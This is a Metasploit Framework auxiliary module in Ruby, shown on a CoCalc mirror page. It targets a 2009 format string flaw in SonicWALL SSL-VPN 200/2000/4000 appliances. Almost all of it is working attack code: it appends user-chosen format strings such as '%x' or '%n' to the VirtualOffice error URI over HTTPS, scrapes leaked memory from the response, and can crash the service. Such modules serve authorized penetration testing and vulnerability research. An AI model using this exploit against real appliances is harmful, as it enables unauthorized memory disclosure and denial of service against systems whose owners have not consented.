Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/dos/http/sonicwall_ssl_format.rb
19721 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::HttpClient

8
  include Msf::Auxiliary::Dos # %n etc kills a thread, but otherwise ok.

9


10
  def initialize(info = {})

11
    super(

12
      update_info(

13
        info,

14
        'Name' => 'SonicWALL SSL-VPN Format String Vulnerability',

15
        'Description' => %q{

16
          There is a format string vulnerability within the SonicWALL

17
          SSL-VPN Appliance - 200, 2000 and 4000 series. Arbitrary memory

18
          can be read or written to, depending on the format string used.

19
          There appears to be a length limit of 127 characters of format

20
          string data. With physical access to the device and debugging,

21
          this module may be able to be used to execute arbitrary code remotely.

22
        },

23
        'Author' => [ 'aushack' ],

24
        'License' => MSF_LICENSE,

25
        'References' => [

26
          [ 'BID', '35145' ],

27
          [ 'OSVDB', '54881' ],

28
          [ 'URL', 'http://www.aushack.com/200905-sonicwall.txt' ],

29
        ],

30
        'DisclosureDate' => '2009-05-29',

31
        'Notes' => {

32
          'Stability' => [CRASH_SERVICE_DOWN],

33
          'SideEffects' => [],

34
          'Reliability' => []

35
        }

36
      )

37
    )

38


39
    register_options([

40
      OptString.new('URI', [ true, 'URI to request', '/cgi-bin/welcome/VirtualOffice?err=' ]),

41
      OptString.new('FORMAT', [ true, 'Format string (i.e. %x, %s, %n, %p etc)', '%x%x%x%x%x%x%x' ]),

42
      Opt::RPORT(443),

43
      OptBool.new('SSL', [true, 'Use SSL', true]),

44
    ])

45
  end

46


47
  def run

48
    if (datastore['FORMAT'].length > 125) # Max length is 127 bytes

49
      print_error('FORMAT string length cannot exceed 125 bytes.')

50
      return

51
    end

52


53
    fmt = datastore['FORMAT'] + 'XX' # XX is 2 bytes used to mark end of memory garbage for regexp

54
    begin

55
      res = send_request_raw({

56
        'uri' => normalize_uri(datastore['URI']) + fmt

57
      })

58


59
      if res && (res.code == 200)

60
        res.body.scan(/\<td class\=\"loginError\"\>(.+)XX/ism)

61
        print_status("Information leaked: #{::Regexp.last_match(1)}")

62
      end

63


64
      print_status("Request sent to #{rhost}:#{rport}")

65
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout

66
      print_status("Couldn't connect to #{rhost}:#{rport}")

67
    rescue ::Timeout::Error, ::Errno::EPIPE => e

68
      vprint_error(e.message)

69
    end

70
  end

71
end

72


73